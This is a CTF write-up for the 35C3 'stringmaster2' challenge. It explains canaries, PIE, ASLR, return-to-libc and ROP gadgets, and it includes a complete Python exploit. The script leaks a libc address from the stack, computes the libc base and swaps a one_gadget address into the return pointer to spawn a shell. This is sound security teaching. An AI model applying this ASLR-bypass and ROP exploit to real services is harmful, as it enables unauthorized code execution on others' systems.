Introduction
Stringmaster2 is a continuation of the previous task, stringmaster1 which I covered here:
https://dbeef.lol/2019/01/27/my-35c3-ctf-writeup-iii-stringmaster1/
I recommend you read it, since I’ll reffer to it in this writeup.
What we find in the distrib folder this time is:
You may wonder why would they include the libc (against which stringmaster2 is linked), but we’ll come to this soon.
Now, to see what changed in the source from stringmaster1:
There are two differences:
- Code – There’s no spawn_shell function provided this time – we can’t dump its address and overwrite return pointer from the play function with it.
- Security measures – Binary is compiled with PIE and stack protector enabled.
PIE stands for Position Independent Executable – which relates to PIC – Position Independent Code, since PIE’s are entirely made from PIC.
On how does it work, you may check on Wikipedia, but what does it change in the context of solving this CTF is:
- Even if we had the spawn_shell function ready in the binary, this time we couldn’t use its absolute address dumped from the binary like in 1996 task.
- We can’t just breakpoint at arbitrarily given address using gdb – though we could fix it by recompiling our local stringmaster2 binary if we really wanted to do some inspection.
If stack protector is enabled, on stack frame, before return address and (optionally) frame pointer, there will be placed another value called stack canary. Since buffer overflow attack to redirect code execution, like in the 1996’s writeup, causes overwriting bytes starting at some variable’s address on the stack to the return pointer, values in between will be overwritten, and thus stack canary will change its value.
Compiler will inject code that checks if that value changed, and if so, it will close program to prevent exploiting.
You can read more on that on the Wikipedia:
https://en.wikipedia.org/wiki/Buffer_overflow_protection#Canaries
But the good news is – those make no obstacles, since like in stringmaster1, we can overwrite arbitrary bytes on the stack frame, so the canary value won’t be overwritten untill we specifically do it, and for the PIC problem – we don’t have the spawn_shell function in the binary anyway, thus we’ll need to return somewhere else – but where will we?
Return to libc
Return to libc (r2libc) technique bases on replacing return pointer’s value with an address from the C library – it may be execve function, the same which was called in spawn_shell in stringmaster1, it may be any other function or even a specific line of code within those functions!
Calling execve this way would involve overwriting:
- Return pointer, previously storing an address of a line in main function, to which call from play will return.
It would be overwritten with an address of execve function (8 bytes). - Address after that, would need to point to a literal with “/bin/bash” (where would we find it – later) – 8 bytes.
- Again, pointer to a literal with “/bin/bash” – 8 bytes.
- Pointer to NULL, which would be 8 zeroed bytes.
- Again, pointer to NULL – 8 zeroed bytes.
Where can we find execv address?
Where can we wind the “/bin/bash” literal I mentioned?
It’s in the libc, just like the execv, but how would it manage to get there?
Let’s download libc sources and find out.
I got mine (version 2.27) from https://ftp.gnu.org/gnu/glibc/.
grep -rni . -e “/bin/sh” causes recursive searching of “/bin/sh” in current path.
As you see, there are some execve calls involving const char literals “/bin/sh” passed as an argument, which means, that those literals will be eventually stored in the .data section of libc .so file, with pointers to them pushed on the stack when one of those specific call happens.
Now, as we know how to manually craft function call to execve with “/bin/bash” as an argument – I will tell you why we won’t do it in this case – though what we’ve learned will come handy, since what we’ll really do is very similar.
See, when last time we did stringmaster1, swapping bytes to make return pointer store value to spawn_shell was very unstable – program crashed at random, and we only tried to swap 8 bytes!
Swapping all bytes from our manually crafted call stack would involve swapping 40 bytes, not mentioning, we would need to have those 40, mostly different values, somewhere on the leaked stack (and that involves a lot of luck).
What if there would be a way to jump directly to the place where execve(“/bin/bash”) is called in the libc (already with the argument on the stack!) just as we’ve seen in libc sources, without planting function arguments?
Return Oriented Progamming
ROP is the technique I’ve just suggested. Find some place in the existing code that you want to execute, get its address and jump to it. Those places that can be jumped to are called ROP gadgets.
We won’t waste time on finding it manually since there is already a tool specifically for finding execve gadget (though, I’ll make another post about this later), it’s called one_gadget and can be downloaded here:
https://github.com/david942j/one_gadget
After installation, we’ll call one_gadget with path to our libc as an argument:
That’s it, we’ve been provided with 3 variants, where registers have different values when calling. We’ll use the first once, but it makes us no difference which one we call.
Return to the plan
So we could use the same python exploit we used before, but with another value of return pointer to substitute (this time the gadget instead of spawn_shell), could we?
Er, no. There’s one last thing I didn’t mention – ASLR, which stands for Address Space Layout Randomization.
The gadget’s address we just took from the libc is an absolute address. It’s an address that takes into account only distance from the beginning of the .so file.
It would be valid only if we added the base libc address to it (the address under which libc is loaded in the system), and the base address changes due to ASLR every time we run the application!
See how the base address changes (ldd runs the program and prints addresses in which libraries are loaded):
As an experiment, let’s temporarily disable ASLR and invoke ldd once again:
As you can see, this time addresses don’t change – how easy it would be to exploit without ASLR! We could just take this permanent base libc address, add absolute address of our gadget and run python script that would change return pointer value.
So in what manner do we defeat ASLR?
Let’s have a detailed look on what’s on stack of a very simple program:
I’ve printed first 20 addresses on the stack when I was breakpointed in the main function. As you see, we have plenty of addresses that reffer to the C library!
First one, __libc_csu_init is the frame pointer in our stack frame, second one, <__libc_start_main+231> is the return pointer – the 231 part means that it points to 231-st byte after the beginning of this function. So we return into a libc function, that called our main before, when bootstrapping the process!
If you want some details on why those addresses are here (not of much relevance for further solving of this task), you can see the answer I gave on Stack Overflow:
https://security.stackexchange.com/a/203313
Same thing happens in stringmaster2 case, we return to the <__libc_start_main+231> too, and what’s nice is this symbol is also leaked in stringmaster2.
Now it’s time to add facts:
- We need libc base address (to which we’ll add absolute address of our gadget)
- We have absolute (from gdb) and [base + absolute] address of <__libc_start_main+231> (from leak)
- We can calculate base address!
Our addresses:
__libc_start_main = 0x21AB0
__libc_start_main + 231 = 0x21B97
At which position will we find <__libc_start_main+231> in stringmaster2’s leak?
At the same we used before, 18-th octet of leaked data is the return pointer, and program tries to return to the <__libc_start_main+231>.
The final algorithm is the same as in stringmaster1, but adding a step before replacing return pointer, because we need to calculate the value with which we will replace:
- Get integer value from 8 bytes starting at (17 * 8) index of leaked bytes array
- Substract 0x21B97 from that value and assign it to libc_base
- Bytes for further replacing are [libc_base + gadget_addr]
That’s how ASLR can be defeated – by leaking some address from libc that we know what it points to (<__libc_start_main+231> in this case).
Final attack
This time I moved the part which sends commands to Client class, but in its essence, code is almost like stringmaster1, besides calculating libc-base.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import time | |
import struct | |
import socket | |
# For finding hex sequence in given subarray (i.e finding pointers' addresses by their supposed value) | |
def find_index_of_subarray(arr, subarr): | |
index = 0 | |
for byte in arr: | |
if len(arr) – index < len(subarr): | |
return –1 | |
if byte == subarr[0]: | |
# Checking if arrays are equal | |
if arr[index:index + len(subarr)] == subarr: | |
return index | |
index += 1 | |
return –1 | |
# For returning sub-bytearray of given length at given index of given bytearray: | |
def get_subarray_at_address(length, index, byte_array): | |
if index + length > len(byte_array): | |
return –1 | |
else: | |
return byte_array[index:index + length] | |
# For finding byte index for given byte value in given array | |
# If found value but it is in protected line, pass this line. | |
def find_byte_index(byte_value, byte_array, protected_lines): | |
index = 0 | |
for byte in byte_array: | |
if byte == byte_value: | |
not_protected_line = True | |
for line in protected_lines: | |
if (not (index < line * 8) and not (index > (line + 1) * 8)): | |
not_protected_line = False | |
break | |
if not_protected_line: | |
return index | |
index += 1 | |
return –1 | |
class Client: | |
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
encoding = 'UTF-8' | |
decode_error_handling = 'ignore' | |
host = '' | |
port = 0 | |
last_retrieved_bytes = bytearray(0) | |
buffer_size = 512 | |
def __init__(self, host, port): | |
self.host = host | |
self.port = port | |
def connect(self): | |
self.sock.connect((self.host, self.port)) | |
def disconnect(self): | |
self.sock.close() | |
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
def wait_for_any_input(self): | |
print('\033[92m' + 'Waiting for any input.' + '\033[0m') | |
self.last_retrieved_bytes = bytearray(0) | |
buffer = self.sock.recv(self.buffer_size) | |
for byte in buffer: | |
self.last_retrieved_bytes.append(byte) | |
input_as_string = buffer.decode(self.encoding, self.decode_error_handling) | |
print(input_as_string) | |
def wait_for_prompt(self): | |
print('\033[94m' + 'Waiting for prompt.' + '\033[0m') | |
self.last_retrieved_bytes = bytearray(0) | |
input_as_string = '' | |
retrieved_full_prompt = False | |
ending_normal = 'quit \n> ' | |
ending_quit = 'You lost.' | |
while not retrieved_full_prompt: | |
buffer = self.sock.recv(self.buffer_size) | |
self.last_retrieved_bytes += buffer | |
input_as_string += buffer.decode(self.encoding, self.decode_error_handling) | |
retrieved_full_prompt = \ | |
(input_as_string.find(ending_normal) != –1) or (input_as_string.find(ending_quit) != –1) | |
print(input_as_string) | |
def retrieved_bytes_truncate_prompt(self): | |
beginning = 'Enter the command you want to execute:'.encode(self.encoding) | |
index = find_index_of_subarray(self.last_retrieved_bytes, beginning) | |
self.last_retrieved_bytes = self.last_retrieved_bytes[:index] | |
def prettyprint_retrieved_bytes(self): | |
offset = len(self.last_retrieved_bytes) | |
line = 1 | |
string = '' | |
# Don't worry, it's just an ANSI color code | |
string += '\033[91m' | |
while offset > 0: | |
str_line = 'Line ' + str(line).zfill(3) + ': ' | |
if offset >= 8: | |
for a in range(0, 8): | |
str_line += '0x' \ | |
+ hex(self.last_retrieved_bytes[a + (line – 1) * 8]).replace('0x', '').rjust(2, '0') + \ | |
' ' | |
else: | |
for a in range(0, offset): | |
str_line += '0x' \ | |
+ hex(self.last_retrieved_bytes[a + (line – 1) * 8]).replace('0x', '').rjust(2, '0') + \ | |
' ' | |
string += str_line + '\n' | |
offset -= 8 | |
line += 1 | |
string += '\033[0m' | |
print(string) | |
return string | |
def send(self, command_bytearr): | |
print('\033[92m' + 'Sending: ' + str(command_bytearr) + '\033[0m') | |
self.sock.sendall(command_bytearr) | |
def send_replace_overflow(self): | |
self.send('replace X a\n'.encode(self.encoding)) | |
def send_replace(self, char_1, bytearr): | |
command = ('replace ' + char_1 + ' ').encode(self.encoding) | |
command += bytearr | |
command += (' \n').encode(self.encoding) | |
print('Sending: ' + str(command)) | |
self.send(command) | |
def send_swap(self, index_1, index_2): | |
self.send(('swap ' + str(index_1) + ' ' + str(index_2) + ' \n').encode(self.encoding)) | |
def send_print(self): | |
self.send(('print\n').encode(self.encoding)) | |
def send_quit(self): | |
self.send(('quit\n').encode(self.encoding)) | |
def send_ls(self): | |
self.send(('ls\n').encode(self.encoding)) | |
# 17 * 8 is end of the 17-th octet (counting from zero), so practically it's 18-th line | |
return_pointer_index = 17 * 8 | |
libc_main_231_absolute = 0x21ab0 + 231 | |
client = Client('localhost', 22225) | |
client.connect() | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.send_replace_overflow() | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
client.prettyprint_retrieved_bytes() | |
copy = client.last_retrieved_bytes | |
libc_main_231_subarray = get_subarray_at_address(8, return_pointer_index, copy) | |
libc_main_231 = struct.unpack('<Q', libc_main_231_subarray)[0] | |
print('libc_main_231_addr is : ' + str(hex(libc_main_231))) | |
libc_base = libc_main_231 – libc_main_231_absolute | |
print('libc base is: ' + str(hex(libc_base))) | |
gadget_int = 0x4f2c5 + libc_base | |
print('gadget is: ' + str(hex(gadget_int))) | |
gadget_bytes = struct.pack('>Q', gadget_int) | |
# time.sleep(2) | |
# Firstly, for every byte of gadget, put its value on the beginning of the leaked data | |
# to make these bytes present on the stack, so we could use swap command in the second next step. | |
offset = 0 | |
for byte in gadget_bytes: | |
copy = client.last_retrieved_bytes | |
s = chr(copy[offset]) | |
bytearr = get_subarray_at_address(1, offset, gadget_bytes) | |
client.send_replace(s, bytearr) | |
offset += 1 | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
# m.client.prettyprint_retrieved_bytes() | |
# Now, for every byte of gadget, swap its value with corresponding return pointer byte | |
offset = 0 | |
for byte in reversed(gadget_bytes): | |
print('Swapping: ' + str(hex(byte))) | |
index = find_byte_index(byte, client.last_retrieved_bytes, [17]) | |
if index == –1: | |
print('Index for ' + str(byte) + ' not found!') | |
exit(–1) | |
else: | |
client.send_swap(return_pointer_index + offset, index) | |
offset += 1 | |
client.wait_for_prompt() | |
client.send_print() | |
client.wait_for_prompt() | |
client.retrieved_bytes_truncate_prompt() | |
# m.client.prettyprint_retrieved_bytes() | |
print('Replaced all bytes for return pointer to libc_system') | |
client.send_quit() | |
client.wait_for_prompt() | |
client.send_ls() | |
print('This should be shell.') | |
client.wait_for_any_input() | |
print('Retrieved bytes counter: ' + str(len(client.last_retrieved_bytes))) | |
print(client.last_retrieved_bytes.decode('utf-8')) |
Summary
So far, it was the most complex task, since it involved:
- Knowing how libc bootstraps processes – that their flow starts not in your main function, but in _libc_start_main, then it redirects flow to your main, and finally returns to <__libc_start_main+231> in the end, when your main return.
You can read more on that on this excellent blog:
http://dbp-consulting.com/tutorials/debugging/linuxProgramStartup.html - Knowing, that because of ASLR, you can’t just use some address extracted from libc, without knowing the base at which libc is loaded at this current process instance.
- Knowing about ROP gadgets, since crafting a call stack for execve by yourself is too unstable to work with given commands (swapping/replacing bytes on stack).
Resources
If you’re curious how it is, that one process can use libc at different address every instance, but its code itself does not change – read about Global Offset Table and Procedure Linkage Table:
https://en.wikipedia.org/wiki/Global_Offset_Table
Also, I’ll have a look at this:
https://github.com/Gallopsled/pwntools
since it looks popular and it’ll probably ease solving CTF’s.